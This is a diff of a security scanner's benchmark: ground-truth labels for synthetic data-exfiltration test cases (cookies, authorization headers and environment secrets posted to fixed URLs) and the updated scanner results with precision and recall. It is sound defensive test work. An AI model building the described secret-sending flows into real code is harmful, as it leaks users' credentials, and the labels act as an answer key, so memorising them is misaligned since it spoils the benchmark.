+ }, + { + "case_id": "js-data_exfil-003", + "file": "javascript/data_exfil/exfil_xhr_send_header.js", + "language": "javascript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [8, 8] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "xhr", + "header" + ], + "disabled": false, + "notes": "Authorization header source flows into XMLHttpRequest.send body at hardcoded URL." + }, + { + "case_id": "ts-data_exfil-001", + "file": "typescript/data_exfil/exfil_fetch_cookie_body.ts", + "language": "typescript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [6, 9] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "fetch", + "cookie" + ], + "disabled": false, + "notes": "TypeScript variant of js-data_exfil-001." 
+ }, + { + "case_id": "ts-data_exfil-002", + "file": "typescript/data_exfil/exfil_fetch_header_body.ts", + "language": "typescript", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [6, 9] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "fetch", + "header" + ], + "disabled": false, + "notes": "Authorization header flows into fetch body at hardcoded URL." + }, + { + "case_id": "py-data_exfil-001", + "file": "python/data_exfil/exfil_requests_post_env_dict.py", + "language": "python", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [14, 14] + ], + "expected_source_lines": [ + [12, 13] + ], + "tags": [ + "data_exfil", + "requests", + "env", + "container" + ], + "disabled": false, + "notes": "Env-config secrets accumulate into a dict, then flow as the json kwarg of requests.post; container-taint round-trip." 
+ }, + { + "case_id": "py-data_exfil-002", + "file": "python/data_exfil/exfil_httpx_async_post_env.py", + "language": "python", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [12, 15] + ], + "expected_source_lines": [ + [11, 11] + ], + "tags": [ + "data_exfil", + "httpx", + "async", + "env" + ], + "disabled": false, + "notes": "Env-config secret flows into httpx.AsyncClient().post json kwarg via the type-qualified HttpClient.post matcher." + }, + { + "case_id": "java-data_exfil-001", + "file": "java/data_exfil/DataExfilJdkHttpClient.java", + "language": "java", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [16, 20] + ], + "expected_source_lines": [ + [13, 14] + ], + "tags": [ + "data_exfil", + "jdk-httpclient", + "cookie" + ], + "disabled": false, + "notes": "Servlet cookie value flows through BodyPublishers.ofString into HttpClient.send body." 
+ }, + { + "case_id": "java-data_exfil-002", + "file": "java/data_exfil/DataExfilOkHttp.java", + "language": "java", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [15, 21] + ], + "expected_source_lines": [ + [13, 13] + ], + "tags": [ + "data_exfil", + "okhttp", + "session" + ], + "disabled": false, + "notes": "HttpSession attribute wraps via RequestBody.create and binds to OkHttp Request.Builder.post; chain-normalized newCall.execute fires DATA_EXFIL." + }, + { + "case_id": "go-data_exfil-001", + "file": "go/data_exfil/exfil_http_post_cookie_body.go", + "language": "go", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [12, 12] + ], + "expected_source_lines": [ + [10, 11] + ], + "tags": [ + "data_exfil", + "http-post", + "cookie" + ], + "disabled": false, + "notes": "Cookie value flows via strings.NewReader into http.Post body at hardcoded URL." 
+ }, + { + "case_id": "rs-data_exfil-001", + "file": "rust/data_exfil/exfil_reqwest_form_env.rs", + "language": "rust", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [5, 8] + ], + "expected_source_lines": [ + [5, 5] + ], + "tags": [ + "data_exfil", + "reqwest", + "form", + "env" + ], + "disabled": false, + "notes": "env::var secret flows into reqwest .form() body chain via the form.send body-bind matcher." + }, + { + "case_id": "rb-data_exfil-001", + "file": "ruby/data_exfil/exfil_net_http_post_cookie.rb", + "language": "ruby", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "HIGH", + "expected_category": "Security", + "expected_sink_lines": [ + [9, 9] + ], + "expected_source_lines": [ + [7, 7] + ], + "tags": [ + "data_exfil", + "net-http", + "cookie" + ], + "disabled": false, + "notes": "request.cookies value flows into Net::HTTP.post body at hardcoded URL." 
+ }, + { + "case_id": "c-data_exfil-001", + "file": "c/data_exfil/exfil_curl_postfields_env.c", + "language": "c", + "is_vulnerable": true, + "vuln_class": "data_exfil", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [ + "taint-data-exfiltration" + ], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [], + "expected_severity": "MEDIUM", + "expected_category": "Security", + "expected_sink_lines": [ + [14, 14] + ], + "expected_source_lines": [ + [9, 9] + ], + "tags": [ + "data_exfil", + "curl", + "gated-sink", + "env" + ], + "disabled": false, + "notes": "getenv secret flows into curl_easy_setopt CURLOPT_POSTFIELDS body; gated-sink fires only at the body-binding setopt." + }, + { + "case_id": "js-safe-data_exfil-001", + "file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js", + "language": "javascript", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "sanitizer-wrap" + ], + "disabled": false, + "notes": "Cookie source routed through default forwarding-wrapper sanitizer (logEvent); DATA_EXFIL must not fire." 
+ }, + { + "case_id": "js-safe-data_exfil-002", + "file": "javascript/safe/safe_data_exfil_user_input_echo.js", + "language": "javascript", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "Plain user input echoed into fetch body at fixed URL; sensitivity-gate suppresses Plain-tier sources for Cap::DATA_EXFIL." + }, + { + "case_id": "py-safe-data_exfil-001", + "file": "python/safe/safe_data_exfil_user_input_echo.py", + "language": "python", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "Flask form-field echoed into requests.post json at fixed URL; sensitivity-gate suppresses Plain-tier user input." 
+ }, + { + "case_id": "go-safe-data_exfil-001", + "file": "go/safe/safe_data_exfil_user_input_echo.go", + "language": "go", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "FormValue plain user input echoed into http.Post body at fixed URL; sensitivity-gate suppresses Plain-tier sources." + }, + { + "case_id": "rb-safe-data_exfil-001", + "file": "ruby/safe/safe_data_exfil_user_input_echo.rb", + "language": "ruby", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "params plain user input echoed into RestClient.post body at fixed URL; sensitivity-gate suppresses Plain-tier sources." 
+ }, + { + "case_id": "c-safe-data_exfil-001", + "file": "c/safe/safe_data_exfil_user_input_echo.c", + "language": "c", + "is_vulnerable": false, + "vuln_class": "safe", + "cwe": "CWE-201", + "provenance": "synthetic", + "equivalence_tier": "exact", + "match_mode": "rule_match", + "expected_rule_ids": [], + "allowed_alternative_rule_ids": [], + "forbidden_rule_ids": [ + "taint-data-exfiltration" + ], + "expected_severity": null, + "expected_category": "Security", + "expected_sink_lines": [], + "expected_source_lines": [], + "tags": [ + "data_exfil", + "safe", + "user-input-gate" + ], + "disabled": false, + "notes": "fgets stdin user input echoed into curl_easy_setopt CURLOPT_POSTFIELDS at fixed URL; sensitivity-gate suppresses Plain-tier sources." } ] } diff --git a/tests/benchmark/results/latest.json b/tests/benchmark/results/latest.json index 25a5477a..136163f1 100644 --- a/tests/benchmark/results/latest.json +++ b/tests/benchmark/results/latest.json @@ -1,6 +1,6 @@ { "benchmark_version": "1.0", - "timestamp": "2026-04-29T21:50:34Z", + "timestamp": "2026-04-30T23:44:32Z", "scanner_version": "0.5.0", "scanner_config": { "analysis_mode": "Full", @@ -9,9 +9,9 @@ "state_analysis_enabled": true, "worker_threads": 1 }, - "ground_truth_hash": "sha256:5b391d654f88673e5a200af875d513cf83812af747739395e8315768b8983ce3", - "corpus_size": 458, - "cases_run": 457, + "ground_truth_hash": "sha256:228d1577d9560cfa08521e783ec513509363470455743a43a4102df713af1849", + "corpus_size": 477, + "cases_run": 476, "cases_skipped": 1, "outcomes": [ { @@ -181,6 +181,25 @@ "security_finding_count": 2, "non_security_finding_count": 0 }, + { + "case_id": "c-data_exfil-001", + "file": "c/data_exfil/exfil_curl_postfields_env.c", + "language": "c", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 9:19)" + ], + "unexpected_rule_ids": [], + 
"all_finding_ids": [ + "taint-data-exfiltration (source 9:19)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "c-fmt-001", "file": "c/fmt_string/fmt_printf.c", @@ -455,6 +474,21 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "c-safe-data_exfil-001", + "file": "c/safe/safe_data_exfil_user_input_echo.c", + "language": "c", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "c-ssrf-001", "file": "c/ssrf/ssrf_curl.c", @@ -1685,11 +1719,14 @@ "matched_rule_ids": [ "rb.deser.yaml_load" ], - "unexpected_rule_ids": [], + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], "all_finding_ids": [ + "cfg-unguarded-sink", "rb.deser.yaml_load" ], - "security_finding_count": 1, + "security_finding_count": 2, "non_security_finding_count": 0 }, { @@ -2066,6 +2103,25 @@ "security_finding_count": 3, "non_security_finding_count": 0 }, + { + "case_id": "go-data_exfil-001", + "file": "go/data_exfil/exfil_http_post_cookie_body.go", + "language": "go", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 11:10)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 11:10)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "go-fmt_string-001", "file": "go/fmt_string/fmt_injection.go", @@ -2453,6 +2509,21 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "go-safe-data_exfil-001", + "file": "go/safe/safe_data_exfil_user_input_echo.go", + "language": "go", + "vuln_class": "safe", + "is_vulnerable": false, 
+ "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "go-safe-fieldproj-phase3", "file": "go/safe/safe_chained_receiver_field_proj.go", @@ -2660,15 +2731,13 @@ "outcome_rule_level": "TP", "outcome_location_level": "TP", "matched_rule_ids": [ - "taint-unsanitised-flow (source 8:9)", "taint-unsanitised-flow (source 8:9)" ], "unexpected_rule_ids": [], "all_finding_ids": [ - "taint-unsanitised-flow (source 8:9)", "taint-unsanitised-flow (source 8:9)" ], - "security_finding_count": 2, + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -2840,6 +2909,44 @@ "security_finding_count": 2, "non_security_finding_count": 0 }, + { + "case_id": "java-data_exfil-001", + "file": "java/data_exfil/DataExfilJdkHttpClient.java", + "language": "java", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 14:28)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 14:28)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "java-data_exfil-002", + "file": "java/data_exfil/DataExfilOkHttp.java", + "language": "java", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 14:33)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 14:33)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "java-deser-001", "file": "java/deser/DeserOis.java", @@ -3005,13 +3112,17 @@ "language": "java", "vuln_class": "safe", 
"is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3095,13 +3206,17 @@ "language": "java", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3321,14 +3436,14 @@ "vuln_class": "ssrf", "is_vulnerable": true, "outcome_file_level": "TP", - "outcome_rule_level": "TP", - "outcome_location_level": "TP", - "matched_rule_ids": [ - "taint-unsanitised-flow (source 7:22)" + "outcome_rule_level": "FN", + "outcome_location_level": "FN", + "matched_rule_ids": [], + "unexpected_rule_ids": [ + "taint-data-exfiltration (source 7:22)" ], - "unexpected_rule_ids": [], "all_finding_ids": [ - "taint-unsanitised-flow (source 7:22)" + "taint-data-exfiltration (source 7:22)" ], "security_finding_count": 1, "non_security_finding_count": 0 @@ -3358,13 +3473,17 @@ "language": "javascript", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + 
"all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3465,6 +3584,63 @@ "security_finding_count": 2, "non_security_finding_count": 0 }, + { + "case_id": "js-data_exfil-001", + "file": "javascript/data_exfil/exfil_fetch_cookie_body.js", + "language": "javascript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "js-data_exfil-002", + "file": "javascript/data_exfil/exfil_fetch_external_destination.js", + "language": "javascript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "js-data_exfil-003", + "file": "javascript/data_exfil/exfil_xhr_send_header.js", + "language": "javascript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "js-destructure-sanitize-001", "file": "javascript/safe/safe_object_destructure_sanitize.js", @@ -3558,13 +3734,17 @@ "language": "javascript", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - 
"outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3588,13 +3768,17 @@ "language": "javascript", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3678,13 +3862,17 @@ "language": "javascript", "vuln_class": "safe", "is_vulnerable": false, - "outcome_file_level": "TN", - "outcome_rule_level": "TN", + "outcome_file_level": "FP", + "outcome_rule_level": "FP", "outcome_location_level": null, "matched_rule_ids": [], - "unexpected_rule_ids": [], - "all_finding_ids": [], - "security_finding_count": 0, + "unexpected_rule_ids": [ + "cfg-unguarded-sink" + ], + "all_finding_ids": [ + "cfg-unguarded-sink" + ], + "security_finding_count": 1, "non_security_finding_count": 0 }, { @@ -3732,6 +3920,36 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "js-safe-data_exfil-001", + "file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js", + "language": "javascript", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, + { + "case_id": 
"js-safe-data_exfil-002", + "file": "javascript/safe/safe_data_exfil_user_input_echo.js", + "language": "javascript", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "js-safe-parseInt-001", "file": "javascript/safe/safe_parseInt.js", @@ -3882,11 +4100,11 @@ "outcome_rule_level": "TP", "outcome_location_level": "TP", "matched_rule_ids": [ - "taint-unsanitised-flow (source 5:5)" + "cfg-unguarded-sink" ], "unexpected_rule_ids": [], "all_finding_ids": [ - "taint-unsanitised-flow (source 5:5)" + "cfg-unguarded-sink" ], "security_finding_count": 1, "non_security_finding_count": 0 @@ -4971,6 +5189,44 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "py-data_exfil-001", + "file": "python/data_exfil/exfil_requests_post_env_dict.py", + "language": "python", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 14:25)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 14:25)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "py-data_exfil-002", + "file": "python/data_exfil/exfil_httpx_async_post_env.py", + "language": "python", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 12:15)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 12:15)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "py-deser-001", "file": 
"python/deser/deser_pickle.py", @@ -5228,6 +5484,21 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "py-safe-data_exfil-001", + "file": "python/safe/safe_data_exfil_user_input_echo.py", + "language": "python", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "py-safe-int-001", "file": "python/safe/safe_int_cast.py", @@ -5425,6 +5696,25 @@ "security_finding_count": 1, "non_security_finding_count": 0 }, + { + "case_id": "rb-data_exfil-001", + "file": "ruby/data_exfil/exfil_net_http_post_cookie.rb", + "language": "ruby", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 7:9)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 7:9)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "rb-interproc-001", "file": "ruby/interprocedural/interproc_taint_propagation.rb", @@ -5504,6 +5794,21 @@ "security_finding_count": 0, "non_security_finding_count": 0 }, + { + "case_id": "rb-safe-data_exfil-001", + "file": "ruby/safe/safe_data_exfil_user_input_echo.rb", + "language": "ruby", + "vuln_class": "safe", + "is_vulnerable": false, + "outcome_file_level": "TN", + "outcome_rule_level": "TN", + "outcome_location_level": null, + "matched_rule_ids": [], + "unexpected_rule_ids": [], + "all_finding_ids": [], + "security_finding_count": 0, + "non_security_finding_count": 0 + }, { "case_id": "rs-auth-001", "file": "rust/auth/actix_scoped_write_missing.rs", @@ -6179,6 +6484,26 @@ "security_finding_count": 1, "non_security_finding_count": 2 }, + { + "case_id": 
"rs-data_exfil-001", + "file": "rust/data_exfil/exfil_reqwest_form_env.rs", + "language": "rust", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:18)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "rs.quality.unwrap", + "taint-data-exfiltration (source 5:18)" + ], + "security_finding_count": 1, + "non_security_finding_count": 1 + }, { "case_id": "rs-deser-001", "file": "rust/deser/deser_serde_yaml.rs", @@ -6717,15 +7042,15 @@ "vuln_class": "ssrf", "is_vulnerable": true, "outcome_file_level": "TP", - "outcome_rule_level": "TP", - "outcome_location_level": "TP", - "matched_rule_ids": [ - "taint-unsanitised-flow (source 4:15)" + "outcome_rule_level": "FN", + "outcome_location_level": "FN", + "matched_rule_ids": [], + "unexpected_rule_ids": [ + "taint-data-exfiltration (source 4:15)" ], - "unexpected_rule_ids": [], "all_finding_ids": [ "rs.quality.unwrap", - "taint-unsanitised-flow (source 4:15)" + "taint-data-exfiltration (source 4:15)" ], "security_finding_count": 1, "non_security_finding_count": 1 @@ -7495,6 +7820,44 @@ "security_finding_count": 1, "non_security_finding_count": 0 }, + { + "case_id": "ts-data_exfil-001", + "file": "typescript/data_exfil/exfil_fetch_cookie_body.ts", + "language": "typescript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": "TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, + { + "case_id": "ts-data_exfil-002", + "file": "typescript/data_exfil/exfil_fetch_header_body.ts", + "language": "typescript", + "vuln_class": "data_exfil", + "is_vulnerable": true, + "outcome_file_level": 
"TP", + "outcome_rule_level": "TP", + "outcome_location_level": "TP", + "matched_rule_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "unexpected_rule_ids": [], + "all_finding_ids": [ + "taint-data-exfiltration (source 5:5)" + ], + "security_finding_count": 1, + "non_security_finding_count": 0 + }, { "case_id": "ts-iife-closure-001", "file": "typescript/safe/safe_iife_closure_sanitizer.ts", @@ -8043,13 +8406,15 @@ "outcome_rule_level": "TP", "outcome_location_level": "TP", "matched_rule_ids": [ + "cfg-unguarded-sink", "cfg-unguarded-sink" ], "unexpected_rule_ids": [], "all_finding_ids": [ + "cfg-unguarded-sink", "cfg-unguarded-sink" ], - "security_finding_count": 1, + "security_finding_count": 2, "non_security_finding_count": 0 }, { @@ -8193,29 +8558,29 @@ } ], "aggregate_file_level": { - "tp": 225, - "fp": 1, + "tp": 238, + "fp": 7, "fn_": 0, "tn": 231, - "precision": 0.995575221238938, + "precision": 0.9714285714285714, "recall": 1.0, - "f1": 0.9977827050997783 + "f1": 0.9855072463768115 }, "aggregate_rule_level": { - "tp": 225, - "fp": 1, - "fn_": 0, + "tp": 236, + "fp": 7, + "fn_": 2, "tn": 231, - "precision": 0.995575221238938, - "recall": 1.0, - "f1": 0.9977827050997783 + "precision": 0.9711934156378601, + "recall": 0.9915966386554622, + "f1": 0.9812889812889812 }, "by_language": { "c": { - "tp": 15, + "tp": 16, "fp": 0, "fn_": 0, - "tn": 15, 